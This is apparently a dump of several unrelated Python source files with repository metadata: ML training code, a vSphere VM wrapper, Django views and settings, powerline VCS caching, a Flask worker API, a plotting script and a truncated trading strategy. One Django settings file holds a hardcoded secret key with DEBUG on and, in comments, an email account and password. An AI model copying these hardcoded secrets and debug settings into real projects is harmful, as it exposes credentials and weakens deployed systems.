initial_epoch=epoch-1)
self.accuracies_per_epoch.append(historytemp.history['val_acc'][0])
#ugly hack to avoid tensorflow memory increase for multiple fit_generator calls. Theano shall work more nicely this but it is outdated in general
self.weightsEvolution()
K.clear_session()
self.create_model()
self.accuracies_per_epoch=np.asarray(self.accuracies_per_epoch)
def read_data(self):
#read CIFAR10 data
(x_train, y_train), (x_test, y_test) = cifar10.load_data()
y_train = np_utils.to_categorical(y_train, self.num_classes)
y_test = np_utils.to_categorical(y_test, self.num_classes)
x_train = x_train.astype('float32')
x_test = x_test.astype('float32')
#normalize data
xTrainMean = np.mean(x_train, axis=0)
xTtrainStd = np.std(x_train, axis=0)
x_train = (x_train - xTrainMean) / xTtrainStd
x_test = (x_test - xTrainMean) / xTtrainStd
return [x_train, x_test, y_train, y_test]
if __name__ == '__main__':
# create and run a SET-MLP model on CIFAR10
model=SET_MLP_CIFAR10()
# save accuracies over for all training epochs
# in "results" folder you can find the output of running this file
np.savetxt("results/set_mlp_srelu_sgd_cifar10_acc.txt", np.asarray(model.accuracies_per_epoch))
|
[
"tmichael.yu@gmail.com"
] |
tmichael.yu@gmail.com
|
38c685e5b3daa3c48549492e8305d7c6ec9b4a63
|
12b41c3bddc48a6df5e55bd16f7b2792ed6e4848
|
/k8_vmware/vsphere/VM.py
|
7d14aa69fb7f78566e20968c659a9f980499f6e4
|
[
"Apache-2.0"
] |
permissive
|
NourEddineX/k8-vmware
|
b128b03b988f8a94d6029458c5415cdd68e12b0a
|
80f2a6d56021a1298919487c8372a88aff3f1fb9
|
refs/heads/main
| 2023-01-23T22:59:41.767216
| 2020-12-11T12:33:11
| 2020-12-11T12:33:11
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,321
|
py
|
import pyVmomi
from osbot_utils.utils.Misc import wait
from k8_vmware.vsphere.VM_Keystroke import VM_Keystroke
class VM:
def __init__(self, vm):
self.vm = vm
def config(self):
return self.summary().config
def controller_scsi(self):
controllers = self.devices_SCSI_Controllers()
if len(controllers) > 0:
return controllers[0] # default to returning the first one
def controller_ide(self):
controllers = self.devices_IDE_Controllers()
if len(controllers) > 0:
return controllers[0] # default to returning the first one
def controller_ide_free_slot(self):
controllers = self.devices_IDE_Controllers()
for controller in controllers:
if len(controller.device) < 2:
return controller
def devices(self):
return self.vm.config.hardware.device
def devices_IDE_Controllers (self): return self.devices_of_type(pyVmomi.vim.vm.device.VirtualIDEController )
def devices_Cdroms (self): return self.devices_of_type(pyVmomi.vim.vm.device.VirtualCdrom )
def devices_Disks (self): return self.devices_of_type(pyVmomi.vim.vm.device.VirtualDisk )
def devices_AHCI_Controllers (self): return self.devices_of_type(pyVmomi.vim.vm.device.VirtualAHCIController )
def devices_PCNet_32s (self): return self.devices_of_type(pyVmomi.vim.vm.device.VirtualPCNet32 )
def devices_Vmxnet_2s (self): return self.devices_of_type(pyVmomi.vim.vm.device.VirtualVmxnet2 )
def devices_Vmxnet_3s (self): return self.devices_of_type(pyVmomi.vim.vm.device.VirtualVmxnet3 )
def devices_E1000s (self): return self.devices_of_type(pyVmomi.vim.vm.device.VirtualE1000 )
def devices_E1000es (self): return self.devices_of_type(pyVmomi.vim.vm.device.VirtualE1000e )
def devices_SCSI_Controllers (self): return self.devices_of_type(pyVmomi.vim.vm.device.VirtualSCSIController )
def devices_Sriov_EthernetCards (self): return self.devices_of_type(pyVmomi.vim.vm.device.VirtualSriovEthernetCard )
def devices_of_type(self, type):
devices = []
for device in self.devices():
if isinstance(device, type):
devices.append(device)
return devices
def devices_indexed_by_label(self):
devices = {}
for device in self.devices():
key = device.deviceInfo.label
value = device
devices[key] = value
return devices
def guest(self):
return self.summary().guest
def info(self):
summary = self.summary() # need to do this since each reference to self.vm.summary.config is call REST call to the server
#print(summary)
config = summary.config # these values are retrieved on the initial call to self.vm.summary
guest = summary.guest # using self.vm.summary.guest here would had resulted in two more REST calls
runtime = summary.runtime
info = {
"Annotation" : config.annotation ,
"BootTime" : str(runtime.bootTime) ,
"ConnectionState" : runtime.connectionState,
"GuestId" : config.guestId ,
"GuestFullName" : config.guestFullName ,
"Host" : runtime.host ,
"HostName" : guest.hostName ,
"IP" : guest.ipAddress ,
"MemorySizeMB" : config.memorySizeMB ,
"MOID" : self.vm._moId ,
"Name" : config.name ,
"MaxCpuUsage" : runtime.maxCpuUsage ,
"MaxMemoryUsage" : runtime.maxMemoryUsage ,
"NumCpu" : config.numCpu ,
"PathName" : config.vmPathName ,
"StateState" : runtime.powerState ,
"Question" : None ,
"UUID" : config.uuid
}
# if guest != None: info['IP'] = guest.ipAddress
if runtime.question != None: info['Question'] = runtime.question.text,
return info
def hardware(self):
return self.vm.config.hardware
def host_name(self):
return self.guest().hostName
def ip(self):
return self.guest().ipAddress
def name(self):
return self.config().name
def moid(self):
return self.vm._moId
def powered_state(self):
return self.runtime().powerState
def power_on(self):
return self.task().power_on()
def power_off(self):
return self.task().power_off()
def powered_on(self):
return self.powered_state() == 'poweredOn'
def powered_off(self):
return self.powered_state() == 'poweredOff'
def screenshot(self, target_file=None):
from k8_vmware.vsphere.VM_Screenshot import VM_Screenshot
return VM_Screenshot(self, target_file=target_file).download()
def send_text(self, text):
VM_Keystroke(self).send_text(text)
return self
def send_key(self, text):
result = VM_Keystroke(self).send_key(text)
return self
def send_enter(self):
VM_Keystroke(self).enter()
return self
def summary(self):
return self.vm.summary # will make REST call to RetrievePropertiesEx
def task(self):
from k8_vmware.vsphere.VM_Task import VM_Task # have to do this import here due to circular dependencies (i.e. VM_Task imports VM)
return VM_Task(self)
def runtime(self):
return self.vm.summary.runtime
def uuid(self):
return self.config().uuid
def wait(self, seconds): # to help with fluent code
wait(seconds)
return self
def __str__(self):
return f'[VM] {self.name()}'
|
[
"dinis.cruz@owasp.org"
] |
dinis.cruz@owasp.org
|
4aa11ff5954703255ef2662ebc7538a8a164e33c
|
0eb6c70503c680ebec415016ff1b0cfac92486ca
|
/lincdm/views/sitemap.py
|
f33aa93f833be7422fb0e7b0f58bb61365b8d717
|
[] |
no_license
|
alexliyu/lincdm
|
c8b473946f59aca9145b3291890635474f144583
|
eab93285f0b03217ea041a7910edae7e00095cd8
|
refs/heads/master
| 2020-12-30T10:50:05.248988
| 2011-08-09T15:52:38
| 2011-08-09T15:52:38
| 1,464,255
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 465
|
py
|
"""Views for entry sitemap"""
from django.views.generic.simple import direct_to_template
from lincdm.entry.models import Entry
from lincdm.entry.models import Category
def sitemap(*ka, **kw):
"""Wrapper around the direct to template generic view to
force the update of the extra context"""
kw['extra_context'] = {'entries': Entry.published.all(),
'categories': Category.tree.all()}
return direct_to_template(*ka, **kw)
|
[
"alexliyu2012@gmail.com"
] |
alexliyu2012@gmail.com
|
a0d7dc6aad5a1fd9f719eb435d819dfdcb3064b5
|
70645d514c24bee0bb02754d43242f4e2c591e42
|
/sgschema/entity.py
|
ab827a53711279a7a154729a1625e824bf587eb5
|
[] |
no_license
|
westernx/sgschema
|
a0aa6e876dc2b20adc998cd5a2aadad4df4d3b55
|
54df94aa5f4c4ae3f78da20380e824231813e8f6
|
refs/heads/master
| 2020-12-24T16:06:27.689021
| 2016-04-12T19:10:43
| 2016-04-12T19:10:43
| 42,960,601
| 2
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,069
|
py
|
from .field import Field
class Entity(object):
def __init__(self, schema, name):
self.schema = schema
self.name = name
self.fields = {}
self.field_aliases = {}
self.field_tags = {}
def _get_or_make_field(self, name):
try:
return self.fields[name]
except KeyError:
return self.fields.setdefault(name, Field(self, name))
def _reduce_raw(self, schema, raw_entity):
pass
def _dump(self):
return dict((k, v) for k, v in (
('fields', self.fields),
('field_aliases', self.field_aliases),
('field_tags', self.field_tags),
) if v)
def _load(self, raw):
for name, value in raw.pop('fields', {}).iteritems():
self._get_or_make_field(name)._load(value)
self.field_aliases.update(raw.pop('field_aliases', {}))
self.field_tags.update(raw.pop('field_tags', {}))
if raw:
raise ValueError('unknown entity keys: %s' % ', '.join(sorted(raw)))
|
[
"westernx@mikeboers.com"
] |
westernx@mikeboers.com
|
46c18773851d9d50911af3f748b4d8451a0762f9
|
e9fa63cc09969ac8f01c185ec5e368ff0b682c42
|
/powerline/powerline/lib/vcs/__init__.py
|
8666f2bf862071b32e9faba1f11a69be8a882675
|
[
"MIT"
] |
permissive
|
harrisjb/dots
|
56ff6248e4edd92e4d62768b0ad6f844ca97079e
|
766be30cb172770bc032f49166bf13fab94e0be8
|
refs/heads/master
| 2021-01-10T21:38:21.528214
| 2014-02-28T16:03:08
| 2014-02-28T16:03:27
| 17,290,180
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,738
|
py
|
# vim:fileencoding=utf-8:noet
from __future__ import absolute_import
import os, errno
from threading import Lock
from collections import defaultdict
vcs_props = (
('git', '.git', os.path.exists),
('mercurial', '.hg', os.path.isdir),
('bzr', '.bzr', os.path.isdir),
)
def generate_directories(path):
if os.path.isdir(path):
yield path
while True:
old_path = path
path = os.path.dirname(path)
if path == old_path or not path:
break
yield path
_file_watcher = None
def file_watcher():
global _file_watcher
if _file_watcher is None:
from powerline.lib.file_watcher import create_file_watcher
_file_watcher = create_file_watcher()
return _file_watcher
branch_name_cache = {}
branch_lock = Lock()
file_status_lock = Lock()
def get_branch_name(directory, config_file, get_func):
global branch_name_cache
with branch_lock:
# Check if the repo directory was moved/deleted
fw = file_watcher()
is_watched = fw.is_watched(directory)
try:
changed = fw(directory)
except OSError as e:
if getattr(e, 'errno', None) != errno.ENOENT:
raise
changed = True
if changed:
branch_name_cache.pop(config_file, None)
# Remove the watches for this repo
if is_watched:
fw.unwatch(directory)
fw.unwatch(config_file)
else:
# Check if the config file has changed
try:
changed = fw(config_file)
except OSError as e:
if getattr(e, 'errno', None) != errno.ENOENT:
raise
# Config file does not exist (happens for mercurial)
if config_file not in branch_name_cache:
branch_name_cache[config_file] = get_func(directory, config_file)
if changed:
# Config file has changed or was not tracked
branch_name_cache[config_file] = get_func(directory, config_file)
return branch_name_cache[config_file]
class FileStatusCache(dict):
def __init__(self):
self.dirstate_map = defaultdict(set)
self.ignore_map = defaultdict(set)
self.keypath_ignore_map = {}
def update_maps(self, keypath, directory, dirstate_file, ignore_file_name, extra_ignore_files):
parent = keypath
ignore_files = set()
while parent != directory:
nparent = os.path.dirname(keypath)
if nparent == parent:
break
parent = nparent
ignore_files.add(os.path.join(parent, ignore_file_name))
for f in extra_ignore_files:
ignore_files.add(f)
self.keypath_ignore_map[keypath] = ignore_files
for ignf in ignore_files:
self.ignore_map[ignf].add(keypath)
self.dirstate_map[dirstate_file].add(keypath)
def invalidate(self, dirstate_file=None, ignore_file=None):
for keypath in self.dirstate_map[dirstate_file]:
self.pop(keypath, None)
for keypath in self.ignore_map[ignore_file]:
self.pop(keypath, None)
def ignore_files(self, keypath):
for ignf in self.keypath_ignore_map[keypath]:
yield ignf
file_status_cache = FileStatusCache()
def get_file_status(directory, dirstate_file, file_path, ignore_file_name, get_func, extra_ignore_files=()):
global file_status_cache
keypath = file_path if os.path.isabs(file_path) else os.path.join(directory, file_path)
file_status_cache.update_maps(keypath, directory, dirstate_file, ignore_file_name, extra_ignore_files)
with file_status_lock:
# Optimize case of keypath not being cached
if keypath not in file_status_cache:
file_status_cache[keypath] = ans = get_func(directory, file_path)
return ans
# Check if any relevant files have changed
file_changed = file_watcher()
changed = False
# Check if dirstate has changed
try:
changed = file_changed(dirstate_file)
except OSError as e:
if getattr(e, 'errno', None) != errno.ENOENT:
raise
# The .git index file does not exist for a new git repo
return get_func(directory, file_path)
if changed:
# Remove all cached values for files that depend on this
# dirstate_file
file_status_cache.invalidate(dirstate_file=dirstate_file)
else:
# Check if the file itself has changed
try:
changed ^= file_changed(keypath)
except OSError as e:
if getattr(e, 'errno', None) != errno.ENOENT:
raise
# Do not call get_func again for a non-existant file
if keypath not in file_status_cache:
file_status_cache[keypath] = get_func(directory, file_path)
return file_status_cache[keypath]
if changed:
file_status_cache.pop(keypath, None)
else:
# Check if one of the ignore files has changed
for ignf in file_status_cache.ignore_files(keypath):
try:
changed ^= file_changed(ignf)
except OSError as e:
if getattr(e, 'errno', None) != errno.ENOENT:
raise
if changed:
# Invalidate cache for all files that might be affected
# by this ignore file
file_status_cache.invalidate(ignore_file=ignf)
break
try:
return file_status_cache[keypath]
except KeyError:
file_status_cache[keypath] = ans = get_func(directory, file_path)
return ans
class TreeStatusCache(dict):
def __init__(self):
from powerline.lib.tree_watcher import TreeWatcher
self.tw = TreeWatcher()
def cache_and_get(self, key, status):
ans = self.get(key, self)
if ans is self:
ans = self[key] = status()
return ans
def __call__(self, repo, logger):
key = repo.directory
try:
if self.tw(key, logger=logger, ignore_event=getattr(repo, 'ignore_event', None)):
self.pop(key, None)
except OSError as e:
logger.warn('Failed to check %s for changes, with error: %s'% key, e)
return self.cache_and_get(key, repo.status)
_tree_status_cache = None
def tree_status(repo, logger):
global _tree_status_cache
if _tree_status_cache is None:
_tree_status_cache = TreeStatusCache()
return _tree_status_cache(repo, logger)
def guess(path):
for directory in generate_directories(path):
for vcs, vcs_dir, check in vcs_props:
repo_dir = os.path.join(directory, vcs_dir)
if check(repo_dir):
if os.path.isdir(repo_dir) and not os.access(repo_dir, os.X_OK):
continue
try:
if vcs not in globals():
globals()[vcs] = getattr(__import__('powerline.lib.vcs', fromlist=[vcs]), vcs)
return globals()[vcs].Repository(directory)
except:
pass
return None
def debug():
''' To use run python -c "from powerline.lib.vcs import debug; debug()" some_file_to_watch '''
import sys
dest = sys.argv[-1]
repo = guess(os.path.abspath(dest))
if repo is None:
print ('%s is not a recognized vcs repo' % dest)
raise SystemExit(1)
print ('Watching %s' % dest)
print ('Press Ctrl-C to exit.')
try:
while True:
if os.path.isdir(dest):
print ('Branch name: %s Status: %s' % (repo.branch(), repo.status()))
else:
print ('File status: %s' % repo.status(dest))
raw_input('Press Enter to check again: ')
except KeyboardInterrupt:
pass
except EOFError:
pass
|
[
"jharris@peopleadmin.com"
] |
jharris@peopleadmin.com
|
aa953a7d03b633cf3ae233b5c331b067e916dc29
|
6ccea6f389fb13f1469a4f75c720db91592395bb
|
/venv/bin/dotenv
|
a779e56f69dded9b4b4e354736ed9d4d4ac1bd44
|
[] |
no_license
|
JessicaBPerez/Flask-Project
|
a8ea5c147c98fbd0b5991453612d1f1d1e572b4c
|
98351b23cfdc7009504a1e1ebd7baeb55e6fc8df
|
refs/heads/master
| 2022-12-26T21:08:37.647859
| 2019-09-27T14:23:28
| 2019-09-27T14:23:28
| 211,336,289
| 0
| 1
| null | 2022-12-13T23:38:59
| 2019-09-27T14:22:21
|
Python
|
UTF-8
|
Python
| false
| false
| 257
|
#!/Users/jessicaperez/treehouse/flask-s3-browser/venv/bin/python3
# -*- coding: utf-8 -*-
import re
import sys
from dotenv.cli import cli
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(cli())
|
[
"jessicaperez@Jessicas-MacBook-Pro-2.local"
] |
jessicaperez@Jessicas-MacBook-Pro-2.local
|
|
9a6d7093b0ded82b5b610224adbf3fcff552c51b
|
ecad74f53abefd26d39359293237fa6fcb098fd3
|
/apps/restApi/app/worker/client/clientController.py
|
bb39c5389d91982964197ebf1922024c84221a2b
|
[
"MIT"
] |
permissive
|
JaeYoung1994/Integrated-solution-management-admin-web
|
d7a923bcd251cf750b47653a60c62620ae9679b5
|
481cfa2bc206db9bd7ff3b534eba64f148dda2d4
|
refs/heads/master
| 2023-04-05T10:17:51.604195
| 2021-04-01T16:37:45
| 2021-04-01T16:38:03
| 353,096,275
| 1
| 0
| null | 2021-03-31T01:42:03
| 2021-03-30T18:05:23
|
Python
|
UTF-8
|
Python
| false
| false
| 3,543
|
py
|
import copy
from flask import request
from flask_restx import Resource, Namespace, fields
from model.redis.worker.client.clientRedis import ClientRedis
from common.utils import Utils
from common.code import ReqCode, CommonCode
ra_worker_client = Namespace(
name='worker_client',
description='Worker to client API'
)
@ra_worker_client.route('/sync/clients')
class worker_client_sync_clients(Resource):
def post(self):
""" Check for duplicate emails in API """
code = 200
try:
req = request.json
rvKey = ['data']
isKey = Utils.isDicHasKey(req, rvKey)
if not isKey:
return ReqCode.notKey.value, 400
commandIp = request.environ.get('HTTP_X_REAL_IP', request.remote_addr)
clientRedis = ClientRedis()
clients = clientRedis.getClient()
connectList = []
for client in clients:
if clients[client] == commandIp:
connectList.append(client)
for conncetIp in connectList:
if conncetIp not in req['data']:
clientRedis.deleteClient(conncetIp)
for clientIp in req['data']:
clientRedis.registClient(commandIp, clientIp)
rv = { "result":True }
except Exception as ex:
rv = copy.deepcopy(CommonCode.UnknownError.value)
rv["msg"] = str(ex)
code = 400
return rv, code # ,header{"hi": "hello"}
@ra_worker_client.route('/get/clients')
class worker_client_get_clients(Resource):
def post(self):
""" Check for duplicate emails in API """
code = 200
try:
req = request.json
clientRedis = ClientRedis()
clients = clientRedis.getClient()
rv = { "result":True, "data":clients}
except Exception as ex:
rv = copy.deepcopy(CommonCode.UnknownError.value)
rv["msg"] = str(ex)
code = 400
return rv, code # ,header{"hi": "hello"}
@ra_worker_client.route('/sync/clients/device')
class worker_client_sync_device(Resource):
def post(self):
""" Check for duplicate emails in API """
code = 200
try:
# 값 존재 여부 확인
req = request.json
rvKey = ['ip', 'data']
isKey, isVal = Utils.isDicHasKey(req, rvKey), Utils.isDicKeyValueNull(req, rvKey)
if not isKey:
return ReqCode.notKey.value, 400
if not isVal:
return ReqCode.keyValNull.value, 400
clientRedis = ClientRedis()
clientRedis.registClientDevice(req['ip'], req['data'])
rv = CommonCode.Success.value
except Exception as ex:
rv = copy.deepcopy(CommonCode.UnknownError.value)
rv["msg"] = str(ex)
code = 400
return rv, code # ,header{"hi": "hello"}
@ra_worker_client.route('/get/clients/device')
class worker_client_get_clients_device(Resource):
def post(self):
""" Check for duplicate emails in API """
code = 200
try:
req = request.json
clientRedis = ClientRedis()
clients = clientRedis.getClientDevice()
rv = {"result": True, "data": clients}
except Exception as ex:
rv = copy.deepcopy(CommonCode.UnknownError.value)
rv["msg"] = str(ex)
code = 400
return rv, code # ,header{"hi": "hello"}
|
[
"shiptroll@gmail.com"
] |
shiptroll@gmail.com
|
f20a18ba8049e30bb628330e99bb1aa9e3c05778
|
1643eab131031cde6a9e87937cf255bc12942603
|
/DFT/silicon_SCAN_KIH/09-inteqp/plot_inteqp.py
|
a5ddabe05a2657ecc5115960fc918beb1ed3bd87
|
[] |
no_license
|
BerkeleyGW/BerkeleyGW-examples
|
619cfc7cef20768c9cfb21d770a5f95562050a57
|
df3fdd910b4b5f8e61e292bc25a75d5d2a96f67a
|
refs/heads/master
| 2021-06-07T20:44:27.534328
| 2021-06-06T05:16:17
| 2021-06-06T05:16:17
| 157,264,924
| 8
| 8
| null | 2021-06-06T05:16:18
| 2018-11-12T19:29:09
|
Standard ML
|
UTF-8
|
Python
| false
| false
| 1,525
|
py
|
#!/usr/bin/env python
#coding: utf-8
# This scripts plots the GW bandstructure of Si interpolated with the inteqp code.
# It reads the bandstructure.dat file from the inteqp.real.x code, and produces
# the output file "bandstructure_inteqp.pdf".
#
# Felipe H. da Jornada, UC Berkeley (2016)
import numpy as np
import matplotlib as mpl
#mpl.use('Agg')
import matplotlib.pyplot as plt
data = np.loadtxt('bandstructure.dat')
bands = data[:,1]
kpts = data[:,2:5]
emf = data[:,5]
eqp = data[:,6]
emf -= np.amax(emf[bands==4])
eqp -= np.amax(eqp[bands==4])
def get_x(ks):
# X axis is \int_0^k |dk|
dk_vec = np.diff(ks, axis=0)
dk_len = np.linalg.norm(dk_vec, axis=1)
return np.insert(np.cumsum(dk_len), 0, 0.)
xmin, xmax = np.inf, -np.inf
bands_uniq = np.unique(bands).astype(np.int)
for ib in bands_uniq:
cond = bands==ib
x = get_x(kpts[cond])
xmin, xmax = min(xmin, x[0]), max(xmax, x[-1])
lmf, = plt.plot(x, emf[cond], '--', color='b', lw=1.5, zorder=2)
lqp, = plt.plot(x, eqp[cond], '-', color='r', lw=1.5, zorder=1)
def to_mathrm(s):
return r'$\mathrm{%s}$'%(s)
ind = [0, 45, 95, 145, 173, 199]
plt.xticks(x[ind], map(to_mathrm, ['W', 'L', r'\Gamma', 'X', 'W', 'K']))
for idx in ind:
plt.axvline(x[idx], color='k')
plt.title('Si bandstructure: inteqp.real.x code')
plt.axhline(0, color='#cccccc', zorder=-10)
plt.xlim(xmin, xmax)
plt.ylim(-12.5, 7.5)
plt.legend([lmf, lqp], ['SCAN', 'GW'], loc='lower right')
plt.ylabel('Energy (eV)')
plt.savefig('bandstructure_inteqp.pdf')
|
[
"zhaofangzhou@berkeley.edu"
] |
zhaofangzhou@berkeley.edu
|
20de67c990dce38433d7243d2f07868697593df2
|
ebf6fb4414fb5c304dad1234fc910e3298034322
|
/CraftWeb/CraftWeb/settings.py
|
99b20e77ba57f4884111f83bea680c144bb9deef
|
[] |
no_license
|
MSVarshini/CarftWeb
|
7b4d9543623759bc8d4e0f1f32a87ff3d60eeb77
|
998bb5967f59cc9bf6fd2fdec6dc232f449b1f86
|
refs/heads/master
| 2023-08-06T23:37:12.694097
| 2021-10-08T07:00:24
| 2021-10-08T07:00:24
| 377,435,762
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,648
|
py
|
"""
Django settings for CraftWeb project.
Generated by 'django-admin startproject' using Django 3.2.
For more information on this file, see
https://docs.djangoproject.com/en/3.2/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.2/ref/settings/
"""
from pathlib import Path
import os
# Build paths inside the project like this: BASE_DIR / 'subdir'.
BASE_DIR = Path(__file__).resolve().parent.parent
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.2/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'django-insecure-(c7v8sxot^3(u8oa683wjnaob8r6y!t(488e*x@6kr4bzqx=ib'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
# EMAIL_HOST = 'smtppro.zoho.in'
# EMAIL_HOST_USER = 'msvarshini2001@gmail.com'
# EMAIL_HOST_PASSWORD = 'varshu777'
# EMAIL_PORT = 587
# EMAIL_USE_TLS = True
# EMAIL_BACKEND = 'django.core.mail.backends.smtp.EmailBackend'
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'Toys',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'CraftWeb.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'CraftWeb.wsgi.application'
AUTH_USER_MODEL="Toys.Customer"
# Database
# https://docs.djangoproject.com/en/3.2/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': BASE_DIR / 'db.sqlite3',
}
}
# Password validation
# https://docs.djangoproject.com/en/3.2/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/3.2/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
ALLOWED_HOSTS = []
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.2/howto/static-files/
STATIC_URL = '/static/'
EMAIL_BACKEND = 'django.core.mail.backends.console.EmailBackend'
STATICFILES_DIRS = (
os.path.join(BASE_DIR,'Toys/assets'),
)
# Default primary key field type
# https://docs.djangoproject.com/en/3.2/ref/settings/#default-auto-field
DEFAULT_AUTO_FIELD = 'django.db.models.BigAutoField'
|
[
"msvarshini2017@gmail.com"
] |
msvarshini2017@gmail.com
|
0584747d8f65280307db8e8f7a973bf9d702eb19
|
39f1ae1e3b95d717f6d103b3ac534b468090c36f
|
/py_blackbox_backend/py_blackbox_backend/settings.py
|
52046da510da0ace923632f0a9d29badf4aa06f4
|
[] |
no_license
|
arron1993/blackbox.arron.id
|
5d532af4e9557986f8af5c9018d9d789bbd03470
|
4da60f3dd524bd0afbdc3613767a818bcab1cd8d
|
refs/heads/master
| 2023-05-04T05:19:15.792063
| 2021-05-20T20:34:28
| 2021-05-20T20:34:28
| 346,052,952
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,974
|
py
|
"""
Django settings for py_blackbox_backend project.
Generated by 'django-admin startproject' using Django 3.1.7.
For more information on this file, see
https://docs.djangoproject.com/en/3.1/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.1/ref/settings/
"""
import datetime
import os
from pathlib import Path
# Build paths inside the project like this: BASE_DIR / 'subdir'.
BASE_DIR = Path(__file__).resolve().parent.parent
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.1/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = os.environ.get(
'DJANGO_SECRET_KEY',
'9qyc-ncc0jq(y*4y6j4w88bffe!isuzf)1e0*sxu4w1d=k4xxo')
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = os.environ.get('DJANGO_DEBUG', '') != 'False'
ALLOWED_HOSTS = ['*']
REST_FRAMEWORK = {
'DEFAULT_AUTHENTICATION_CLASSES': [
'rest_framework_simplejwt.authentication.JWTAuthentication',
],
}
SIMPLE_JWT = {
"ACCESS_TOKEN_LIFETIME": datetime.timedelta(days=7),
"REFRESH_TOKEN_LIFETIME": datetime.timedelta(days=14),
}
INSTALLED_APPS = [
'fuel.apps.FuelConfig',
'circuit.apps.CircuitConfig',
'car.apps.CarConfig',
'session.apps.SessionConfig',
'session_type.apps.SessionTypeConfig',
'metrics.apps.MetricsConfig',
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'rest_framework',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'py_blackbox_backend.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'py_blackbox_backend.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.1/ref/settings/#databases
if DEBUG:
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': BASE_DIR / 'db.sqlite3',
}
}
else:
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.postgresql_psycopg2',
'NAME': "live-blackbox",
'USER': 'postgres',
'PASSWORD': 'postgres',
'HOST': 'db'
}
}
# Password validation
# https://docs.djangoproject.com/en/3.1/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/3.1/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.1/howto/static-files/
STATIC_URL = '/static/'
|
[
"arron.moore93@gmail.com"
] |
arron.moore93@gmail.com
|
a47f4334ddb60f8f67f9a7edac853de8ffff5e6a
|
e461234a9898186795e2bb7938d7fc8bf05d988b
|
/ichimoku_strategy.py
|
9b39f64c9ac1e82825d0fb676dff376f96069b84
|
[] |
no_license
|
hajtos/PYTHON_Ichimoku
|
46e13139b2986b6e66745f447f02cfc35a9d4f89
|
c7d5d5389da0fada5d089048c953d7b03a92dd62
|
refs/heads/master
| 2020-04-07T05:37:48.339847
| 2019-01-29T18:58:41
| 2019-01-29T18:58:41
| 158,103,260
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 7,499
|
py
|
from strategy import Strategy
class ZigZag:
def __init__(self, fraction, graph):
self.peaks = [(0, graph.close(0))]
i = 1
while graph.close(i) == graph.close(0):
i += 1
direction = 1 if graph.close(i) >= graph.close(0) else -1
